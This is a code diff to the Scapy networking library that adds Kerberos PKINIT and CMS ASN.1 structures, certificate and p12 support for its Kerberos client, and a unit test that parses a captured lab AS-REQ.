+ +# still RFC 4556 sect 3.2.1 + + +class PKAuthenticator(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + Microseconds("cusec", 0, explicit_tag=0xA0), + KerberosTime("ctime", GeneralizedTime(), explicit_tag=0xA1), + UInt32("nonce", 0, explicit_tag=0xA2), + ASN1F_optional( + ASN1F_STRING("paChecksum", "", explicit_tag=0xA3), + ), + # RFC8070 extension + ASN1F_optional( + ASN1F_STRING("freshnessToken", "", explicit_tag=0xA4), + ), + # [MS-PKCA] sect 2.2.3 + ASN1F_optional( + ASN1F_PACKET("paChecksum2", None, PAChecksum2, explicit_tag=0xA5), + ), + ) + + +# RFC8636 sect 6 + + +class KDFAlgorithmId(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("kdfId", "", explicit_tag=0xA0), + ) + + +# still RFC 4556 sect 3.2.1 + + +class AuthPack(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET( + "pkAuthenticator", + PKAuthenticator(), + PKAuthenticator, + explicit_tag=0xA0, + ), + ASN1F_optional( + ASN1F_PACKET( + "clientPublicValue", + X509_SubjectPublicKeyInfo(), + X509_SubjectPublicKeyInfo, + explicit_tag=0xA1, + ), + ), + ASN1F_optional( + ASN1F_SEQUENCE_OF( + "supportedCMSTypes", + [], + X509_AlgorithmIdentifier, + explicit_tag=0xA2, + ), + ), + ASN1F_optional( + ASN1F_STRING("clientDCNonce", None, explicit_tag=0xA3), + ), + # RFC8636 extension + ASN1F_optional( + ASN1F_SEQUENCE_OF("supportedKDFs", None, KDFAlgorithmId, explicit_tag=0xA4), + ), + ) + + +_CMS_ENCAPSULATED["1.3.6.1.5.2.3.1"] = AuthPack + # sect 3.2.3 class DHRepInfo(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - ASN1F_STRING("dhSignedData", "", implicit_tag=0xA0), + ASN1F_STRING_ENCAPS( + "dhSignedData", + CMS_ContentInfo(), + CMS_ContentInfo, + implicit_tag=0x80, + ), ASN1F_optional( ASN1F_STRING("serverDHNonce", "", explicit_tag=0xA1), ), + # RFC8636 extension + ASN1F_optional( + ASN1F_PACKET("kdf", None, KDFAlgorithmId, explicit_tag=0xA2), + ), ) @@ -1263,6 +1387,22 @@ class PA_PK_AS_REP(ASN1_Packet): _PADATA_CLASSES[17] = PA_PK_AS_REP + +class KDCDHKeyInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_BIT_STRING_ENCAPS( + "subjectPublicKey", DHPublicKey(), DHPublicKey, explicit_tag=0xA0 + ), + UInt32("nonce", 0, explicit_tag=0xA1), + ASN1F_optional( + KerberosTime("dhKeyExpiration", None, explicit_tag=0xA2), + ), + ) + + +_CMS_ENCAPSULATED["1.3.6.1.5.2.3.2"] = KDCDHKeyInfo + # [MS-SFU] @@ -1992,6 +2132,8 @@ class KRB_ERROR(ASN1_Packet): 91: "KDC_ERR_MORE_PREAUTH_DATA_REQUIRED", 92: "KDC_ERR_PREAUTH_BAD_AUTHENTICATION_SET", 93: "KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS", + # RFC8636 + 100: "KDC_ERR_NO_ACCEPTABLE_KDF", }, explicit_tag=0xA6, ), @@ -2714,21 +2856,25 @@ def select(sockets, remain=None): class KerberosClient(Automaton): """ + Implementation of a Kerberos client. + + Prefer to use the ``krb_as_req`` and ``krb_tgs_req`` functions which + wrap this client. + + Common parameters: + :param mode: the mode to use for the client (default: AS_REQ). :param ip: the IP of the DC (default: discovered by dclocator) :param upn: the UPN of the client. :param password: the password of the client. :param key: the Key of the client (instead of the password) :param realm: the realm of the domain. (default: from the UPN) - :param spn: the SPN to request in a TGS-REQ - :param ticket: the existing ticket to use in a TGS-REQ :param host: the name of the host doing the request - :param renew: sets the Renew flag in a TGS-REQ - :param additional_tickets: in U2U or S4U2Proxy, the additional tickets - :param u2u: sets the U2U flag - :param for_user: the UPN of another user in TGS-REQ, to do a S4U2Self - :param s4u2proxy: sets the S4U2Proxy flag - :param dmsa: sets the 'unconditional delegation' mode for DMSA TGT retrieval + :param port: the Kerberos port (default 88) + :param timeout: timeout of each request (default 5) + + Advanced common parameters: + :param kdc_proxy: specify a KDC proxy url :param kdc_proxy_no_check_certificate: do not check the KDC proxy certificate :param fast: use FAST armoring @@ -2736,8 +2882,24 @@ class KerberosClient(Automaton): :param armor_ticket_upn: the UPN of the client of the armoring ticket :param armor_ticket_skey: the session Key object of the armoring ticket :param etypes: specify the list of encryption types to support - :param port: the Kerberos port (default 88) - :param timeout: timeout of each request (default 5) + + AS-REQ only: + + :param x509: a X509 certificate to use for PKINIT AS_REQ or S4U2Proxy + :param x509key: the private key of the X509 certificate (in an AS_REQ) + :param p12: (optional) use a pfx/p12 instead of x509 and x509key. In this case, + 'password' is the password of the p12. + + TGS-REQ only: + + :param spn: the SPN to request in a TGS-REQ + :param ticket: the existing ticket to use in a TGS-REQ + :param renew: sets the Renew flag in a TGS-REQ + :param additional_tickets: in U2U or S4U2Proxy, the additional tickets + :param u2u: sets the U2U flag + :param for_user: the UPN of another user in TGS-REQ, to do a S4U2Self + :param s4u2proxy: sets the S4U2Proxy flag + :param dmsa: sets the 'unconditional delegation' mode for DMSA TGT retrieval """ RES_AS_MODE = namedtuple("AS_Result", ["asrep", "sessionkey", "kdcrep"]) @@ -2756,6 +2918,9 @@ def __init__( password=None, key=None, realm=None, + x509=None, + x509key=None, + p12=None, spn=None, ticket=None, host=None, @@ -2796,9 +2961,31 @@ def __init__( else: raise ValueError("Invalid realm") + # PKINIT checks + if p12 is not None: + from cryptography.hazmat.primitives.serialization import pkcs12 + + # password should be None or bytes + if isinstance(password, str): + password = password.encode() + + # Read p12/pfx + with open(p12, "rb") as fd: + x509key, x509, _ = pkcs12.load_key_and_certificates( + fd.read(), + password=password, + ) + x509 = Cert(cryptography_obj=x509) + x509key = PrivKey(cryptography_obj=x509key) + elif x509 and x509key: + x509 = Cert(x509) + x509key = PrivKey(x509key) + if mode in [self.MODE.AS_REQ, self.MODE.GET_SALT]: if not host: raise ValueError("Invalid host") + if (x509 is None) ^ (x509key is None): + raise ValueError("Must provide both 'x509' and 'x509key' !") elif mode == self.MODE.TGS_REQ: if not ticket: raise ValueError("Invalid ticket") @@ -2815,6 +3002,7 @@ def __init__( debug=kwargs.get("debug", 0), ).ip + # Armoring checks if fast: if mode == self.MODE.AS_REQ: # Requires an external ticket @@ -2867,6 +3055,8 @@ def __init__( self.spn = spn self.upn = upn self.realm = realm.upper() + self.x509 = x509 + self.x509key = x509key self.ticket = ticket self.fast = fast self.armor_ticket = armor_ticket @@ -2902,6 +3092,10 @@ def __init__( ) def _connect(self): + """ + Internal function to bind a socket to the DC. + This also takes care of an eventual KDC proxy. + """ if self.kdc_proxy: # If we are using a KDC Proxy, wrap the socket with the KdcProxySocket, # that takes our messages and transport them over HTTP. @@ -2918,9 +3112,15 @@ def _connect(self): return sock def send(self, pkt): + """ + Sends a wrapped Kerberos packet + """ super(KerberosClient, self).send(KerberosTCPHeader() / pkt) def _base_kdc_req(self, now_time): + """ + Return the KRB_KDC_REQ_BODY used in both AS-REQ and TGS-REQ + """ kdcreq = KRB_KDC_REQ_BODY( etype=[ASN1_INTEGER(x) for x in self.etypes], additionalTickets=None, @@ -3112,33 +3312,44 @@ def as_req(self): # Pre-auth is requested if self.pre_auth: - if self.fast: - # Special FAST factor - # RFC6113 sect 5.4.6 - from scapy.libs.rfc3961 import KRB_FX_CF2 - - # Calculate the 'challenge key' - ts_key = KRB_FX_CF2( - self.fast_armorkey, - self.key, - b"clientchallengearmor", - b"challengelongterm", - ) + if self.x509: + # Special PKINIT (RFC4556) factor pafactor = PADATA( - padataType=138, # PA-ENCRYPTED-CHALLENGE - padataValue=EncryptedData(), + padataType=16, padataValue=PA_PK_AS_REQ() # PA-PK-AS-REQ ) + raise NotImplementedError("PKINIT isn't implemented yet !") else: - # Usual 'timestamp' factor - ts_key = self.key - pafactor = PADATA( - padataType=2, # PA-ENC-TIMESTAMP - padataValue=EncryptedData(), + # Key-based factor + + if self.fast: + # Special FAST factor + # RFC6113 sect 5.4.6 + from scapy.libs.rfc3961 import KRB_FX_CF2 + + # Calculate the 'challenge key' + ts_key = KRB_FX_CF2( + self.fast_armorkey, + self.key, + b"clientchallengearmor", + b"challengelongterm", + ) + pafactor = PADATA( + padataType=138, # PA-ENCRYPTED-CHALLENGE + padataValue=EncryptedData(), + ) + else: + # Usual 'timestamp' factor + ts_key = self.key + pafactor = PADATA( + padataType=2, # PA-ENC-TIMESTAMP + padataValue=EncryptedData(), + ) + pafactor.padataValue.encrypt( + ts_key, + PA_ENC_TS_ENC(patimestamp=ASN1_GENERALIZED_TIME(now_time)), ) - pafactor.padataValue.encrypt( - ts_key, - PA_ENC_TS_ENC(patimestamp=ASN1_GENERALIZED_TIME(now_time)), - ) + + # Insert Pre-Authentication data padata.insert( 0, pafactor, @@ -3664,7 +3875,17 @@ def _spn_are_equal(spn1, spn2): def krb_as_req( - upn, spn=None, ip=None, key=None, password=None, realm=None, host="WIN10", **kwargs + upn, + spn=None, + ip=None, + key=None, + password=None, + realm=None, + host="WIN10", + p12=None, + x509=None, + x509key=None, + **kwargs, ): r""" Kerberos AS-Req @@ -3677,6 +3898,10 @@ def krb_as_req( _kerberos._tcp.dc._msdcs.domain.local). :param key: (optional) pass the Key object. :param password: (optional) otherwise, pass the user's password + :param x509: (optional) pass a x509 certificate for PKINIT. + :param x509key: (optional) pass the key of the x509 certificate for PKINIT. + :param p12: (optional) use a pfx/p12 instead of x509 and x509key. In this case, + 'password' is the password of the p12. :param realm: (optional) the realm to use. Otherwise use the one from UPN. :param host: (optional) the host performing the AS-Req. WIN10 by default. @@ -3684,19 +3909,23 @@ def krb_as_req( Example:: - >>> # The KDC is on 192.168.122.17, we ask a TGT for user1 - >>> krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", password="Password1") + >>> # The KDC is found via DC Locator, we ask a TGT for user1 + >>> krb_as_req("user1@DOMAIN.LOCAL", password="Password1") Equivalent:: >>> from scapy.libs.rfc3961 import Key, EncryptionType >>> key = Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, key=hex_bytes("6d0748c546 ...: f4e99205e78f8da7681d4ec5520ae4815543720c2a647c1ae814c9")) - >>> krb_as_req("user1@DOMAIN.LOCAL", "192.168.122.17", key=key) + >>> krb_as_req("user1@DOMAIN.LOCAL", ip="192.168.122.17", key=key) + + Example using PKINIT with a p12:: + + >>> krb_as_req("user1@DOMAIN.LOCAL", p12="./store.p12", password="password") """ if realm is None: _, realm = _parse_upn(upn) - if key is None: + if key is None and p12 is None and x509 is None: if password is None: try: from prompt_toolkit import prompt @@ -3713,6 +3942,9 @@ def krb_as_req( upn=upn, password=password, key=key, + p12=p12, + x509=x509, + x509key=x509key, **kwargs, ) cli.run() diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index 7a491ef61ee..b38f52ca073 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -451,7 +451,7 @@ class _PrivKeyFactory(_PKIObjMaker): It casts the appropriate class on the fly, then fills in the appropriate attributes with import_from_asn1pkt() submethod. """ - def __call__(cls, key_path=None): + def __call__(cls, key_path=None, cryptography_obj=None): """ key_path may be the path to either: _an RSAPrivateKey_OpenSSL (as generated by openssl); @@ -468,7 +468,19 @@ def __call__(cls, key_path=None): obj.fill_and_store() return obj - obj = _PKIObjMaker.__call__(cls, key_path, _MAX_KEY_SIZE) + # This allows to import cryptography objects directly + if cryptography_obj is not None: + # We (stupidly) need to go through the whole import process because RSA + # does more than just importing the cryptography objects... + obj = _PKIObj("DER", cryptography_obj.private_bytes( + encoding=serialization.Encoding.DER, + format=serialization.PrivateFormat.PKCS8, + encryption_algorithm=serialization.NoEncryption() + )) + else: + # Load from file + obj = _PKIObjMaker.__call__(cls, key_path, _MAX_KEY_SIZE) + try: privkey = RSAPrivateKey_OpenSSL(obj._der) privkey = privkey.privateKey @@ -725,9 +737,16 @@ class _CertMaker(_PKIObjMaker): Metaclass for Cert creation. It is not necessary as it was for the keys, but we reuse the model instead of creating redundant constructors. """ - def __call__(cls, cert_path): - obj = _PKIObjMaker.__call__(cls, cert_path, - _MAX_CERT_SIZE, "CERTIFICATE") + def __call__(cls, cert_path=None, cryptography_obj=None): + # This allows to import cryptography objects directly + if cryptography_obj is not None: + obj = _PKIObj("DER", cryptography_obj.public_bytes( + encoding=serialization.Encoding.DER, + )) + else: + # Load from file + obj = _PKIObjMaker.__call__(cls, cert_path, + _MAX_CERT_SIZE, "CERTIFICATE") obj.__class__ = Cert obj.marker = "CERTIFICATE" try: diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index 0879aab1144..1f1afe4f9c9 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -2,18 +2,24 @@ # This file is part of Scapy # See https://scapy.net/ for more information # Copyright (C) Philippe Biondi -# Acknowledgment: Maxence Tury +# Acknowledgment: Arnaud Ebalard & Maxence Tury # Cool history about this file: http://natisbad.org/scapy/index.html """ -X.509 certificates. +X.509 certificates and other crypto-related ASN.1 structures """ from scapy.asn1.mib import conf # loads conf.mib -from scapy.asn1.asn1 import ASN1_Codecs, ASN1_OID, \ - ASN1_IA5_STRING, ASN1_NULL, ASN1_PRINTABLE_STRING, \ - ASN1_UTC_TIME, ASN1_UTF8_STRING +from scapy.asn1.asn1 import ( + ASN1_Codecs, + ASN1_IA5_STRING, + ASN1_NULL, + ASN1_OID, + ASN1_PRINTABLE_STRING, + ASN1_UTC_TIME, + ASN1_UTF8_STRING, +) from scapy.asn1packet import ASN1_Packet from scapy.asn1fields import ( ASN1F_BIT_STRING_ENCAPS, @@ -111,6 +117,38 @@ class RSAPrivateKey(ASN1_Packet): ASN1F_SEQUENCE_OF("otherPrimeInfos", None, RSAOtherPrimeInfo))) +#################################### +# Diffie Hellman Packets # +#################################### +# From X9.42 (or RFC3279) + + +class ValidationParms(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_BIT_STRING("seed", ""), + ASN1F_INTEGER("pgenCounter", 0), + ) + + +class DomainParameters(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("p", 0), + ASN1F_INTEGER("g", 0), + ASN1F_INTEGER("q", 0), + ASN1F_optional(ASN1F_INTEGER("j", 0)), + ASN1F_optional( + ASN1F_PACKET("validationParms", None, ValidationParms), + ), + ) + + +class DHPublicKey(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_INTEGER("y", 0) + + #################################### # ECDSA packets # #################################### @@ -810,8 +848,14 @@ class X509_AlgorithmIdentifier(ASN1_Packet): ASN1_root = ASN1F_SEQUENCE( ASN1F_OID("algorithm", "1.2.840.113549.1.1.11"), ASN1F_optional( - ASN1F_CHOICE("parameters", ASN1_NULL(0), - ASN1F_NULL, ECParameters))) + ASN1F_CHOICE( + "parameters", ASN1_NULL(0), + ASN1F_NULL, + ECParameters, + DomainParameters, + ) + ) + ) class ASN1F_X509_SubjectPublicKeyInfo(ASN1F_SEQUENCE): @@ -829,6 +873,10 @@ def __init__(self, **kargs): ECDSAPublicKey(), ECDSAPublicKey), lambda pkt: "ecPublicKey" == pkt.signatureAlgorithm.algorithm.oidname), # noqa: E501 + (ASN1F_BIT_STRING_ENCAPS("subjectPublicKey", + DHPublicKey(), + DHPublicKey), + lambda pkt: "dhpublicnumber" == pkt.signatureAlgorithm.algorithm.oidname), # noqa: E501 (ASN1F_PACKET("subjectPublicKey", EdDSAPublicKey(), EdDSAPublicKey), @@ -1128,6 +1176,171 @@ class X509_CRL(ASN1_Packet): ASN1_root = ASN1F_X509_CRL() +##################### +# CMS packets # +##################### +# based on RFC 3852 + +CMSVersion = ASN1F_INTEGER + +# RFC3852 sect 5.2 + +# Other layers should store the structures that can be encapsulated +# by CMS here, referred by their OIDs. +_CMS_ENCAPSULATED = {} + + +class _EncapsulatedContent_Field(ASN1F_STRING_PacketField): + def m2i(self, pkt, s): + val = super(_EncapsulatedContent_Field, self).m2i(pkt, s) + if not val[0].val: + return val + + # Get encapsulated value from its type + if pkt.eContentType.val in _CMS_ENCAPSULATED: + return ( + _CMS_ENCAPSULATED[pkt.eContentType.val](val[0].val, _underlayer=pkt), + val[1], + ) + + return val + + +class CMS_EncapsulatedContentInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("eContentType", "0"), + ASN1F_optional( + _EncapsulatedContent_Field("eContent", None, + explicit_tag=0xA0), + ) + ) + + +# RFC3852 sect 10.2.1 + +class CMS_RevocationInfoChoice(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "crl", None, + ASN1F_PACKET("crl", X509_CRL(), X509_Cert), + # -- TODO: 1 + ) + + +# RFC3852 sect 10.2.2 + +class CMS_CertificateChoices(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "certificate", None, + ASN1F_PACKET("certificate", X509_Cert(), X509_Cert), + # -- TODO: 0, 1, 2 + ) + + +# RFC3852 sect 10.2.4 + +class CMS_IssuerAndSerialNumber(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_PACKET("issuer", X509_DirectoryName(), X509_DirectoryName), + ASN1F_INTEGER("serialNumber", 0) + ) + + +# RFC3852 sect 5.3 + + +class CMS_Attribute(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("attrType", "0"), + ASN1F_SET_OF("attrValues", [], ASN1F_field("attr", None)) + ) + + +class CMS_SignerInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + CMSVersion("version", 1), + ASN1F_PACKET("sid", CMS_IssuerAndSerialNumber(), CMS_IssuerAndSerialNumber), + ASN1F_PACKET("digestAlgorithm", X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier), + ASN1F_optional( + ASN1F_SET_OF( + "signedAttrs", + None, + CMS_Attribute, + implicit_tag=0xA0, + ) + ), + ASN1F_PACKET("signatureAlgorithm", X509_AlgorithmIdentifier(), + X509_AlgorithmIdentifier), + ASN1F_STRING("signature", ASN1_UTF8_STRING("")), + ASN1F_optional( + ASN1F_SET_OF( + "unsignedAttrs", + None, + CMS_Attribute, + implicit_tag=0xA1, + ) + ) + ) + + +# RFC3852 sect 5.1 + +class CMS_SignedData(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + CMSVersion("version", 1), + ASN1F_SET_OF("digestAlgorithms", [], X509_AlgorithmIdentifier), + ASN1F_PACKET("encapContentInfo", CMS_EncapsulatedContentInfo(), + CMS_EncapsulatedContentInfo), + ASN1F_optional( + ASN1F_SET_OF( + "certificates", + None, + CMS_CertificateChoices, + implicit_tag=0xA0, + ) + ), + ASN1F_optional( + ASN1F_SET_OF( + "crls", + None, + CMS_RevocationInfoChoice, + implicit_tag=0xA1, + ) + ), + ASN1F_SET_OF( + "signerInfos", + [], + CMS_SignerInfo, + ), + ) + +# RFC3852 sect 3 + + +class CMS_ContentInfo(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_OID("contentType", "1.2.840.113549.1.7.2"), + MultipleTypeField( + [ + ( + ASN1F_PACKET("content", None, CMS_SignedData, + explicit_tag=0xA0), + lambda pkt: pkt.contentType.oidname == "id-signedData" + ) + ], + ASN1F_BIT_STRING("content", "", explicit_tag=0xA0) + ) + ) + + ############################# # OCSP Status packets # ############################# diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index eb94aaef16b..7d95584c9e1 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -186,6 +186,58 @@ assert krbfastreq.reqBody.addresses[0].address == b'SRV ' data = bytes(pkt.root.reqBody) fastreq.armoredData.reqChecksum.verify(armorkey, data) += PKINIT - Parse AS-REQ with CMS structures (MIT Kerberos) + +pkt = Kerberos(bytes.fromhex('6a820df230820deea103020105a20302010aa3820d4b30820d4730820d2ba103020110a2820d2204820d1e30820d1a80820c4b30820c4706092a864886f70d010702a0820c3830820c34020103310f300d060960864801650304020105003082041c06072b060105020301a082040f0482040b30820407a0733071a00502030a8eb7a111180f32303235303932313130343332385aa20602045ba497a5a316041467a8b2f1aded7272d4840000331ffbbfc942a304a5353033a02204205aeb03e889e99fcd6c205ef484b9dd7b462b9e94c3fe68b115a71cd287fcd775a10d300b0609608648016503040201a182032a308203263082021906072a8648ce3e02013082020c0282010100ffffffffffffffffc90fdaa22168c234c4c6628b80dc1cd129024e088a67cc74020bbea63b139b22514a08798e3404ddef9519b3cd3a431b302b0a6df25f14374fe1356d6d51c245e485b576625e7ec6f44c42e9a637ed6b0bff5cb6f406b7edee386bfb5a899fa5ae9f24117c4b1fe649286651ece45b3dc2007cb8a163bf0598da48361c55d39a69163fa8fd24cf5f83655d23dca3ad961c62f356208552bb9ed529077096966d670c354e4abc9804f1746c08ca18217c32905e462e36ce3be39e772c180e86039b2783a2ec07a28fb5c55df06f4c52c9de2bcbf6955817183995497cea956ae515d2261898fa051015728e5a8aacaa68ffffffffffffffff020102028201007fffffffffffffffe487ed5110b4611a62633145c06e0e68948127044533e63a0105df531d89cd9128a5043cc71a026ef7ca8cd9e69d218d98158536f92f8a1ba7f09ab6b6a8e122f242dabb312f3f637a262174d31bf6b585ffae5b7a035bf6f71c35fdad44cfd2d74f9208be258ff324943328f6722d9ee1003e5c50b1df82cc6d241b0e2ae9cd348b1fd47e9267afc1b2ae91ee51d6cb0e3179ab1042a95dcf6a9483b84b4b36b3861aa7255e4c0278ba3604650c10be19482f23171b671df1cf3b960c074301cd93c1d17603d147dae2aef837a62964ef15e5fb4aac0b8c1ccaa4be754ab5728ae9130c4c7d02880ab9472d455655347fffffffffffffff0382010500028201007b93ec38a6d3a2e5ea4776f7c942c54f06c334ea637cf45e59c21f6638f6b5baa23420d3229c4a418579db1ce3b956d12ec1bce6883621720f2e596a65dd05881745e7524c88447a5e7a45e149e09f163093088716808e6520a471b53631262a19dc4b3b896717ddca77e15c2d8cf31aa1c03a604834e5f852dc4ac86518f53de4d16101c7f26253973987e1f8c6e8298159ff039646052afe14d634891f57abe5787cb023481aceb65c6ee92b123dfd2ddd15f7dcd733be535d063c4d42a309cb7b84163f8924f88c1b3e400b7f78556ba27d0456b739fe261286cffe7ae404379bc2157bf49fc610e4d46339e0e0a380f8e3b818b0bd4f7a038644f12c77bfa2343032300a06082a8648ce3d040304300a06082a8648ce3d040302300b06092a864886f70d01010d300b06092a864886f70d01010ba42c302a300ca00a06082b06010502030602300ca00a06082b06010502030601300ca00a06082b06010502030603a08206243082062030820508a00302010202131b000000028b4c5c90b3392fca000000000002300d06092a864886f70d01010b0500304731153013060a0992268993f22c64011916054c4f43414c31163014060a0992268993f22c6401191606444f4d41494e311630140603550403130d444f4d41494e2d4443312d4341301e170d3235303932303232313135385a170d3236303932303232313135385a305731153013060a0992268993f22c64011916054c4f43414c31163014060a0992268993f22c6401191606444f4d41494e310e300c060355040313055573657273311630140603550403130d41646d696e6973747261746f7230820122300d06092a864886f70d01010105000382010f003082010a02820101009edc4865105bdbe4843dcb43a1ed273630d4bb84e2c6096cb8ef4d111da3dfc8ad78ff7a02a6ea6da16f2ecd0a7e4a85c7b685b02286298493834f8361a318864bea2f2faa92a3236cd1e373eb2874ff8e09468762de9af0a0881ea098fbeadccb9573e53c90da8398a9992e6e6a46081e23c31527453f9540ab4bca93d7b139a97c3a0392d8c035832005cc1ae2fdbfe098381e62b37cd6b94ea638fd06d2e2dfb4c1c35896d717188fa8c472a42aaf65c04ff1f2a55dbb0b02dcec1f9e07d7dd930ddec43947cf229324bfa5189bfc5a34a59864c95fa2351b506979cf1bc3529a7933be0f2004932490d1a250735bd692af367f5ca326d392c28c99bde1210203010001a38202f3308202ef301706092b0601040182371402040a1e08005500730065007230290603551d2504223020060a2b0601040182370a030406082b0601050507030406082b06010505070302300e0603551d0f0101ff0404030205a0304406092a864886f70d01090f04373035300e06082a864886f70d030202020080300e06082a864886f70d030402020080300706052b0e030207300a06082a864886f70d0307301d0603551d0e041604140a63d8a405fe59c3f3abbef3111f6f6a6a08a973301f0603551d23041830168014ab14d5ae948281f079726970b3b8f97003aa760c3081c80603551d1f0481c03081bd3081baa081b7a081b48681b16c6461703a2f2f2f434e3d444f4d41494e2d4443312d43412c434e3d4443312c434e3d4344502c434e3d5075626c69632532304b657925323053657276696365732c434e3d53657276696365732c434e3d436f6e66696775726174696f6e2c44433d444f4d41494e2c44433d4c4f43414c3f63657274696669636174655265766f636174696f6e4c6973743f626173653f6f626a656374436c6173733d63524c446973747269627574696f6e506f696e743081c006082b060105050701010481b33081b03081ad06082b060105050730028681a06c6461703a2f2f2f434e3d444f4d41494e2d4443312d43412c434e3d4149412c434e3d5075626c69632532304b657925323053657276696365732c434e3d53657276696365732c434e3d436f6e66696775726174696f6e2c44433d444f4d41494e2c44433d4c4f43414c3f634143657274696669636174653f626173653f6f626a656374436c6173733d63657274696669636174696f6e417574686f7269747930350603551d11042e302ca02a060a2b060104018237140203a01c0c1a41646d696e6973747261746f7240444f4d41494e2e4c4f43414c304e06092b06010401823719020441303fa03d060a2b060104018237190201a02f042d532d312d352d32312d313332323235373836362d343033353133333636322d313134303736393232322d353030300d06092a864886f70d01010b050003820101005b76869c48c9e4f28043253b8552a6017dc25f9dc990da86a79210f334c1a7e50b6125ab176bc7bb194b96a02736c9838117071d533e99467bf24219228bb40b6d410c8fb23f129010b68777acb83944842a0af694673206be22c0a0078ee0543962b31bae8d809ef553dbe858cd063a7a06f1ea7d026394ace39f294ad5d8c1b077e58e7d17f86eea918aa88ac09cf55ffcf147aa14a4c64f4216211e45fd8794b2906a29b97bcbd47a0b213768f5403f9aa08fd23ea92664fb9a0246ae75e34f939102fad7c48b8c5bb650203aa48b48bed4635bff4e3386e694d57a4e7e65939c5a5a72997176b5d0e50bd369e78bbf0cda53db204fbf37839223daff3a06318201d4308201d0020101305e304731153013060a0992268993f22c64011916054c4f43414c31163014060a0992268993f22c6401191606444f4d41494e311630140603550403130d444f4d41494e2d4443312d434102131b000000028b4c5c90b3392fca000000000002300d06096086480165030402010500a049301606092a864886f70d010903310906072b060105020301302f06092a864886f70d010904312204200e44063cba7907120ced545618cd365edc5071fdc806e8fdb990a7c858d37ef9300d06092a864886f70d01010b0500048201008c8e52430905bb06e897cb5eda4a466ebc6bf980a997d662b9a6f94b88173bab6e8b76b375454c7e06f2091f1ef43165e378263290a1dae9243f58a0e234ed0a082364afe9529b8e5ffee1df77f67a448f6461fac44562ca919381146d5c73e5e643ef8936765cb45661dcf4cf8b7652eee81712037ab7f007046e62ee98ea5f9d3acf426462591e9726f8a50677d935ebaf2f1fbc046033b6cb601c67d1bfe0b4485ab99fb1862500e861a114a03f1b693dd674a28516a240698c516bf94f09dde7ef80772e5098083bf3916ced80118d8f9f0bc737ec15c3d65cfb85e0d186ab11e9c7ab9383ee8fb4a2b7681c6c97edc8fcd48b7bb2dac49c52d70fab5ec1a181c83081c53081c28049304731153013060a0992268993f22c64011916054c4f43414c31163014060a0992268993f22c6401191606444f4d41494e311630140603550403130d444f4d41494e2d4443312d4341815d305b304731153013060a0992268993f22c64011916054c4f43414c31163014060a0992268993f22c6401191606444f4d41494e311630140603550403130d444f4d41494e2d4443312d434102106b671318bb858b8e437e4229b0d32f1282160414ab14d5ae948281f079726970b3b8f97003aa760c300aa10402020096a2020400300aa10402020095a2020400a4819230818fa00703050050000010a11a3018a003020101a111300f1b0d41646d696e6973747261746f72a20e1b0c646f6d61696e2e6c6f63616ca321301fa003020102a11830161b066b72627467741b0c646f6d61696e2e6c6f63616ca511180f32303235303932323130343332325aa70602045ba497a5a81a301802011202011102011402011302011002011702011902011a')) +assert isinstance(pkt.root.padata[0].padataValue, PA_PK_AS_REQ) + +pk_preauth = pkt.root.padata[0].padataValue +assert len(pk_preauth.trustedCertifiers) == 1 +assert pk_preauth.trustedCertifiers[0].subjectName.directoryName[0].rdn[0].type.oidname == "dc" +assert pk_preauth.trustedCertifiers[0].subjectName.directoryName[0].rdn[0].value.val == b"LOCAL" +assert pk_preauth.trustedCertifiers[0].subjectName.directoryName[1].rdn[0].type.oidname == "dc" +assert pk_preauth.trustedCertifiers[0].subjectName.directoryName[1].rdn[0].value.val == b"DOMAIN" +assert pk_preauth.trustedCertifiers[0].subjectName.directoryName[2].rdn[0].type.oidname == "commonName" +assert pk_preauth.trustedCertifiers[0].subjectName.directoryName[2].rdn[0].value.val == b"DOMAIN-DC1-CA" +assert pk_preauth.trustedCertifiers[0].issuerAndSerialNumber.serialNumber.val == 142762589450708598374370602088381230866 + +authpack = pk_preauth.signedAuthpack.content.encapContentInfo.eContent +assert [x.algorithm.oidname for x in authpack.supportedCMSTypes] == [ + 'ecdsa-with-SHA512', + 'ecdsa-with-SHA256', + 'sha512WithRSAEncryption', + 'sha256WithRSAEncryption', +] +assert [x.kdfId.oidname for x in authpack.supportedKDFs] == ['id-pkinit-kdf-sha256', 'id-pkinit-kdf-sha1', 'id-pkinit-kdf-sha512'] 